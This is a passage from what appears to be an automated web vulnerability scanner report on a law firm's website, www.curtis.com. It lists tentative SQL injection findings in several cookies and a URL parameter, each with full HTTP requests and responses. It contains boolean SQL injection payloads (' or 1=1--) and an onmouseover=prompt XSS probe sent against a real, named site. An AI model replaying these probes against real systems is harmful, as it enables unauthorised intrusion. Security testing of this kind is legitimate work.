GET /emaildisclaimer.cfm?itemID=%22%20onmouseover%3dprompt%28937974%29%20bad%3d%22&itemname=Curtis,%20Mallet-Prevost,%20Colt%20%26%20Mosle%20LLP.&itemType=1 HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.6.10.1303145803; CFID=617584353431827%20or%201%3d2--%20; CFTOKEN=32575697

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 17:06:36 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6176368;path=/
Set-Cookie: CFTOKEN=71631396;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>Email Disclaimer</title>
<link href="scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<style type="text/css">
<!--
body,td,th {
   font-family: Verdana, Arial, Helvetica, sans-serif;
   color: #000000;
   line-height: 1.4em;
   font-size: 8pt;
}
body {
   background-color: #FFF;
   margin: 20px;
}

-->
</style>
</head>

<body>
<table width="460" border="0" align="center" cellpadding="0" cellspacing="0" bgcolor="#FFFFFF">
<tr>
<td valign="top" style="padding: 20px; text-align:justify;">
<p>We value your interest in Curtis, Mallet-Prevost, Colt & Mosle LLP and any communications prompted by your viewing of our website. It is important to us that you understand that transmitting information to us by e-mail does not establish any attorney-client or confidential relationship with us. An attorney-client relationship, and an obligation for the Firm to maintain your communications in confidence, can be created only after proper checks for potential conflicts with current clients are conducted and an agreement of representation is reached. Any information provided to us without such a prior agreement may waive legal privileges that you might otherwise have. In addition, in the absence of such an agreement, the Firm will be entitled to utilize such information on behalf of existing or future clients who may be adverse to your interests. For that reason, please refrain from sending the Firm confidential information through e-mail. Thank you for your interest in Cu
...[SNIP]...

1.14. http://www.curtis.com/emaildisclaimer.cfm [CFTOKEN cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.curtis.com
Path:   /emaildisclaimer.cfm

Issue detail

The CFTOKEN cookie appears to be vulnerable to SQL injection attacks. The payloads 17943346%20or%201%3d1--%20 and 17943346%20or%201%3d2--%20 were each submitted in the CFTOKEN cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /emaildisclaimer.cfm?itemID=%22%20onmouseover%3dprompt%28937974%29%20bad%3d%22&itemname=Curtis,%20Mallet-Prevost,%20Colt%20%26%20Mosle%20LLP.&itemType=1 HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.6.10.1303145803; CFID=6175843; CFTOKEN=3257569717943346%20or%201%3d1--%20

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Mon, 18 Apr 2011 17:06:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFTOKEN=;expires=Sun, 18-Apr-2010 17:06:43 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /emaildisclaimer.cfm?itemID=%22%20onmouseover%3dprompt%28937974%29%20bad%3d%22&itemname=Curtis,%20Mallet-Prevost,%20Colt%20%26%20Mosle%20LLP.&itemType=1 HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.6.10.1303145803; CFID=6175843; CFTOKEN=3257569717943346%20or%201%3d2--%20

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 17:06:57 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6176385;path=/
Set-Cookie: CFTOKEN=23633185;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>Email Disclaimer</title>
<link href="scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<style type="text/css">
<!--
body,td,th {
   font-family: Verdana, Arial, Helvetica, sans-serif;
   color: #000000;
   line-height: 1.4em;
   font-size: 8pt;
}
body {
   background-color: #FFF;
   margin: 20px;
}

-->
</style>
</head>

<body>
<table width="460" border="0" align="center" cellpadding="0" cellspacing="0" bgcolor="#FFFFFF">
<tr>
<td valign="top" style="padding: 20px; text-align:justify;">
<p>We value your interest in Curtis, Mallet-Prevost, Colt & Mosle LLP and any communications prompted by your viewing of our website. It is important to us that you understand that transmitting information to us by e-mail does not establish any attorney-client or confidential relationship with us. An attorney-client relationship, and an obligation for the Firm to maintain your communications in confidence, can be created only after proper checks for potential conflicts with current clients are conducted and an agreement of representation is reached. Any information provided to us without such a prior agreement may waive legal privileges that you might otherwise have. In addition, in the absence of such an agreement, the Firm will be entitled to utilize such information on behalf of existing or future clients who may be adverse to your interests. For that reason, please refrain from sending the Firm confidential information through e-mail. Thank you for your interest in Cu
...[SNIP]...

1.15. http://www.curtis.com/emaildisclaimer.cfm [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.curtis.com
Path:   /emaildisclaimer.cfm

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 59265610'%20or%201%3d1--%20 and 59265610'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /emaildisclaimer.cfm59265610'%20or%201%3d1--%20?itemID=%22%20onmouseover%3dprompt%28937974%29%20bad%3d%22&itemname=Curtis,%20Mallet-Prevost,%20Colt%20%26%20Mosle%20LLP.&itemType=1 HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.6.10.1303145803; CFID=6175843; CFTOKEN=32575697

Response 1 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 17:07:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

<link rel="stylesheet" href="scripts/general.css" type="text/css" media="all" />
<link rel="stylesheet" href="scripts/menu.css" type="text/css" media="all" />
<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css"/>
<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />
<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>
<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>
<script src="scripts/AC_RunActiveContent.js" type="text/javascript"></script>
<script language="javascript" type="text/javascript" src="scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="scripts/jquery.dimensions.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/carousel/carousel_behavior_min.js"></script>
<script language="javascript" type="text/javascript" src="scripts/nyroModal/nyroModal.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<link rel="stylesheet" href="scripts/carousel/carousel.css" type="text/css">


<script type="text/javascript">
<!--//
function checkSearchFormKeyword(){
    if((document.forms["sitesearch"].keyword.value.length == 0)||(document.forms["sitesearch"].keyword.value == "Enter Keyword")){
       alert('Please enter a keyword for your search.');
       document.forms["sitesearch"].keyword.focus();
       return false;
       }
   }
function checkSearchFormAttorney(){
    if((document.forms["attorneysearch"].firstlastname.value.length == 0)||(document.forms["attorneysearch"].firstlastname.value == "Enter Attorney Name")){
       alert('Please enter an attorneys first or last name for your search.');
       document.forms["attorneysearc
...[SNIP]...

Request 2

GET /emaildisclaimer.cfm59265610'%20or%201%3d2--%20?itemID=%22%20onmouseover%3dprompt%28937974%29%20bad%3d%22&itemname=Curtis,%20Mallet-Prevost,%20Colt%20%26%20Mosle%20LLP.&itemType=1 HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.6.10.1303145803; CFID=6175843; CFTOKEN=32575697

Response 2 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 17:07:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">

<link href="scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<link href="/sifr3/sifr3.css" rel="stylesheet" type="text/css" />

<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>

<!--::staticcontent::-->

<script type="text/javascript">
<!--//
function checkSearchFormKeyword(){
    if((document.forms["sitesearch"].keyword.value.length == 0)||(document.forms["sitesearch"].keyword.value == "Enter Keyword")){
       alert('Please enter a keyword for your search.');
       document.forms["sitesearch"].keyword.focus();
       return false;
       }
   }
function checkSearchFormAttorney(){
    if((document.forms["attorneysearch"].firstlastname.value.length == 0)||(document.forms["attorneysearch"].firstlastname.value == "Enter Attorney Name")){
       alert('Please enter an attorneys first or last name for your search.');
       document.forms["attorneysearch"].firstlastname.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
body,td,th {
   font-size: 8pt;
}
body {
   background-color: #FFF;
   margin-left: 0px;
   margin-top: 10px;
   margin-right: 0px;
   margin-bottom: 10px;
}
--
...[SNIP]...

1.16. http://www.curtis.com/emaildisclaimer.cfm [__utma cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.curtis.com
Path:   /emaildisclaimer.cfm

Issue detail

The __utma cookie appears to be vulnerable to SQL injection attacks. The payloads 60403110'%20or%201%3d1--%20 and 60403110'%20or%201%3d2--%20 were each submitted in the __utma cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /emaildisclaimer.cfm?itemID=%22%20onmouseover%3dprompt%28937974%29%20bad%3d%22&itemname=Curtis,%20Mallet-Prevost,%20Colt%20%26%20Mosle%20LLP.&itemType=1 HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=126702367.1899750302.1303145803.1303145803.1303145803.160403110'%20or%201%3d1--%20; __utmc=126702367; __utmb=126702367.6.10.1303145803; CFID=6175843; CFTOKEN=32575697

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Mon, 18 Apr 2011 17:06:19 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: __UTMA=;expires=Sun, 18-Apr-2010 17:06:19 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /emaildisclaimer.cfm?itemID=%22%20onmouseover%3dprompt%28937974%29%20bad%3d%22&itemname=Curtis,%20Mallet-Prevost,%20Colt%20%26%20Mosle%20LLP.&itemType=1 HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=126702367.1899750302.1303145803.1303145803.1303145803.160403110'%20or%201%3d2--%20; __utmc=126702367; __utmb=126702367.6.10.1303145803; CFID=6175843; CFTOKEN=32575697

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 17:06:19 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>Email Disclaimer</title>
<link href="scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<style type="text/css">
<!--
body,td,th {
   font-family: Verdana, Arial, Helvetica, sans-serif;
   color: #000000;
   line-height: 1.4em;
   font-size: 8pt;
}
body {
   background-color: #FFF;
   margin: 20px;
}

-->
</style>
</head>

<body>
<table width="460" border="0" align="center" cellpadding="0" cellspacing="0" bgcolor="#FFFFFF">
<tr>
<td valign="top" style="padding: 20px; text-align:justify;">
<p>We value your interest in Curtis, Mallet-Prevost, Colt & Mosle LLP and any communications prompted by your viewing of our website. It is important to us that you understand that transmitting information to us by e-mail does not establish any attorney-client or confidential relationship with us. An attorney-client relationship, and an obligation for the Firm to maintain your communications in confidence, can be created only after proper checks for potential conflicts with current clients are conducted and an agreement of representation is reached. Any information provided to us without such a prior agreement may waive legal privileges that you might otherwise have. In addition, in the absence of such an agreement, the Firm will be entitled to utilize such information on behalf of existing or future clients who may be adverse to your interests. For that reason, please refrain from sending the Firm confidential information through e-mail. Thank you for your interest in Cu
...[SNIP]...

1.17. http://www.curtis.com/emaildisclaimer.cfm [__utmb cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.curtis.com
Path:   /emaildisclaimer.cfm

Issue detail

The __utmb cookie appears to be vulnerable to SQL injection attacks. The payloads 21125157'%20or%201%3d1--%20 and 21125157'%20or%201%3d2--%20 were each submitted in the __utmb cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /emaildisclaimer.cfm?itemID=%22%20onmouseover%3dprompt%28937974%29%20bad%3d%22&itemname=Curtis,%20Mallet-Prevost,%20Colt%20%26%20Mosle%20LLP.&itemType=1 HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.6.10.130314580321125157'%20or%201%3d1--%20; CFID=6175843; CFTOKEN=32575697

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Mon, 18 Apr 2011 17:06:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: __UTMB=;expires=Sun, 18-Apr-2010 17:06:31 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /emaildisclaimer.cfm?itemID=%22%20onmouseover%3dprompt%28937974%29%20bad%3d%22&itemname=Curtis,%20Mallet-Prevost,%20Colt%20%26%20Mosle%20LLP.&itemType=1 HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.6.10.130314580321125157'%20or%201%3d2--%20; CFID=6175843; CFTOKEN=32575697

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 17:06:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>Email Disclaimer</title>
<link href="scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<style type="text/css">
<!--
body,td,th {
   font-family: Verdana, Arial, Helvetica, sans-serif;
   color: #000000;
   line-height: 1.4em;
   font-size: 8pt;
}
body {
   background-color: #FFF;
   margin: 20px;
}

-->
</style>
</head>

<body>
<table width="460" border="0" align="center" cellpadding="0" cellspacing="0" bgcolor="#FFFFFF">
<tr>
<td valign="top" style="padding: 20px; text-align:justify;">
<p>We value your interest in Curtis, Mallet-Prevost, Colt & Mosle LLP and any communications prompted by your viewing of our website. It is important to us that you understand that transmitting information to us by e-mail does not establish any attorney-client or confidential relationship with us. An attorney-client relationship, and an obligation for the Firm to maintain your communications in confidence, can be created only after proper checks for potential conflicts with current clients are conducted and an agreement of representation is reached. Any information provided to us without such a prior agreement may waive legal privileges that you might otherwise have. In addition, in the absence of such an agreement, the Firm will be entitled to utilize such information on behalf of existing or future clients who may be adverse to your interests. For that reason, please refrain from sending the Firm confidential information through e-mail. Thank you for your interest in Cu
...[SNIP]...

1.18. http://www.curtis.com/emaildisclaimer.cfm [__utmc cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.curtis.com
Path:   /emaildisclaimer.cfm

Issue detail

The __utmc cookie appears to be vulnerable to SQL injection attacks. The payloads 14813370%20or%201%3d1--%20 and 14813370%20or%201%3d2--%20 were each submitted in the __utmc cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /emaildisclaimer.cfm?itemID=%22%20onmouseover%3dprompt%28937974%29%20bad%3d%22&itemname=Curtis,%20Mallet-Prevost,%20Colt%20%26%20Mosle%20LLP.&itemType=1 HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=12670236714813370%20or%201%3d1--%20; __utmb=126702367.6.10.1303145803; CFID=6175843; CFTOKEN=32575697

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Mon, 18 Apr 2011 17:06:25 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: __UTMC=;expires=Sun, 18-Apr-2010 17:06:25 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /emaildisclaimer.cfm?itemID=%22%20onmouseover%3dprompt%28937974%29%20bad%3d%22&itemname=Curtis,%20Mallet-Prevost,%20Colt%20%26%20Mosle%20LLP.&itemType=1 HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=12670236714813370%20or%201%3d2--%20; __utmb=126702367.6.10.1303145803; CFID=6175843; CFTOKEN=32575697

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 17:06:25 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>Email Disclaimer</title>
<link href="scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<style type="text/css">
<!--
body,td,th {
   font-family: Verdana, Arial, Helvetica, sans-serif;
   color: #000000;
   line-height: 1.4em;
   font-size: 8pt;
}
body {
   background-color: #FFF;
   margin: 20px;
}

-->
</style>
</head>

<body>
<table width="460" border="0" align="center" cellpadding="0" cellspacing="0" bgcolor="#FFFFFF">
<tr>
<td valign="top" style="padding: 20px; text-align:justify;">
<p>We value your interest in Curtis, Mallet-Prevost, Colt & Mosle LLP and any communications prompted by your viewing of our website. It is important to us that you understand that transmitting information to us by e-mail does not establish any attorney-client or confidential relationship with us. An attorney-client relationship, and an obligation for the Firm to maintain your communications in confidence, can be created only after proper checks for potential conflicts with current clients are conducted and an agreement of representation is reached. Any information provided to us without such a prior agreement may waive legal privileges that you might otherwise have. In addition, in the absence of such an agreement, the Firm will be entitled to utilize such information on behalf of existing or future clients who may be adverse to your interests. For that reason, please refrain from sending the Firm confidential information through e-mail. Thank you for your interest in Cu
...[SNIP]...

1.19. http://www.curtis.com/emaildisclaimer.cfm [__utmz cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.curtis.com
Path:   /emaildisclaimer.cfm

Issue detail

The __utmz cookie appears to be vulnerable to SQL injection attacks. The payloads 16707661'%20or%201%3d1--%20 and 16707661'%20or%201%3d2--%20 were each submitted in the __utmz cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /emaildisclaimer.cfm?itemID=%22%20onmouseover%3dprompt%28937974%29%20bad%3d%22&itemname=Curtis,%20Mallet-Prevost,%20Colt%20%26%20Mosle%20LLP.&itemType=1 HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)16707661'%20or%201%3d1--%20; __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.6.10.1303145803; CFID=6175843; CFTOKEN=32575697

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Mon, 18 Apr 2011 17:06:14 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: __UTMZ=;expires=Sun, 18-Apr-2010 17:06:14 GMT;path=/
location: /
